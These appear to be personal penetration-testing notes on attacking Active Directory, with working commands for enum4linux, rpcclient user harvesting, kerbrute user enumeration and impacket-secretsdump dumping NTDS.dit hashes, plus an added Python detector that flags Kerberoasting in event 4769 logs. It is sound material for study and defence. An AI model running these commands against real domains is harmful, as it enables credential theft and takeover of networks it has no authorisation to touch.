Active Directory

Attack Workflow

  • Determine what ports are open
  • Enumerate with the tools below (enum4linux, rpcclient)

enum4linux

Used to enumerate a huge amount of AD information from the command line.

enum4linux -a 10.1.1.10        # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U 10.1.1.10    # Use stolen creds to enumerate all users
enum4linux -S 10.1.1.10        # Attempt to gather SMB shares

rpcclient

Used to enumerate information about a system over RPC.

Gather a list of domain accounts with rpcclient (enumdomusers prints one user:[name] rid:[0x...] line per account; the awk calls keep only the name) and save it to a file:

rpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt

Password Spraying

A tool such as Talon can run password spray attacks across an AD environment.

Kerberos

./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt

Kerberoasting

Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hashes to crack offline. We must find all accounts in AD which have an SPN (Service Principal Name), then request RC4 tickets for them from the DC.
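Because the technique described above requests RC4 tickets for many SPN-bearing accounts in a short burst, it is visible on the domain controller in event 4769 (a Kerberos service ticket was requested). The following is an added example, not code from the original notes: it reads a constructed, simplified 4769 line format and flags a requesting account that collects tickets for several different user-type service accounts, reporting how many of those used RC4. Computer accounts (names ending in `$`) and `krbtgt` are excluded because tickets for them are routine and not what gets roasted. Line layout, names and threshold are assumptions; the encryption type values are the real Kerberos etype numbers.

```python
"""Flag likely Kerberoasting in Kerberos service-ticket events (Windows 4769).

Added illustrative example (not from the original notes). A roasting run is one
account asking the DC for tickets to many distinct service accounts, usually
with RC4 (etype 0x17) requested so the ticket is cheap to crack offline.
"""
from collections import defaultdict
import re

RC4_HMAC = 0x17          # etype 23
AES128_CTS_HMAC = 0x11   # etype 17
AES256_CTS_HMAC = 0x12   # etype 18

# Constructed sample 4769 lines (assumed format):
#   "<ts> account=<requesting user> service=<service account> etype=<hex> client=<ip>"
SAMPLE_4769 = """\
2024-01-01T12:00:00 account=jdoe service=WS01$ etype=0x12 client=10.0.0.20
2024-01-01T12:00:05 account=jdoe service=krbtgt etype=0x12 client=10.0.0.20
2024-01-01T12:01:00 account=lowpriv service=svc_sql etype=0x17 client=10.0.0.99
2024-01-01T12:01:01 account=lowpriv service=svc_http etype=0x17 client=10.0.0.99
2024-01-01T12:01:01 account=lowpriv service=svc_backup etype=0x17 client=10.0.0.99
2024-01-01T12:01:02 account=lowpriv service=svc_ldap etype=0x17 client=10.0.0.99
2024-01-01T12:01:02 account=lowpriv service=krbtgt etype=0x17 client=10.0.0.99
2024-01-01T12:30:00 account=alice service=svc_sql etype=0x12 client=10.0.0.31
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) account=(?P<account>\S+) service=(?P<service>\S+) "
    r"etype=(?P<etype>0x[0-9a-fA-F]+) client=(?P<client>\S+)$"
)


def parse_4769(text):
    """Parse the constructed 4769 line format; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["etype"] = int(d["etype"], 16)
        events.append(d)
    return events


def is_roastable_target(service):
    """Only user-type service accounts matter; machine accounts and krbtgt are skipped."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def find_kerberoasting(events, min_services=3):
    """{account: {"services": [...], "rc4_requests": n}} for accounts that
    requested tickets to at least min_services distinct user-type service accounts."""
    services = defaultdict(set)
    rc4_count = defaultdict(int)
    for e in events:
        if not is_roastable_target(e["service"]):
            continue
        services[e["account"]].add(e["service"])
        if e["etype"] == RC4_HMAC:
            rc4_count[e["account"]] += 1
    return {
        acct: {"services": sorted(svcs), "rc4_requests": rc4_count[acct]}
        for acct, svcs in services.items()
        if len(svcs) >= min_services
    }


if __name__ == "__main__":
    for acct, info in find_kerberoasting(parse_4769(SAMPLE_4769)).items():
        print(f"{acct}: {len(info['services'])} service tickets, {info['rc4_requests']} via RC4")
```

In the sample only `lowpriv` is flagged (four user-type services, all RC4); `jdoe` touched only a computer account and `krbtgt`, and `alice` requested a single AES ticket. Domains that still run RC4 everywhere lose the etype signal, which is why the count of distinct services is the primary condition and the RC4 count is reported alongside it rather than required.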

secretsdump

Used to extract hashes from a server. The command below pulls the domain hashes out of NTDS.dit, assuming you have an account with the necessary permissions.

impacket-secretsdump -just-dc backup:backup2517860@10.10.107.154
Kerbrute, used to run various Kerberos attacks. Written in Go.
https://github.com/ropnop/kerbrute

AD Detailed Mind Map
https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg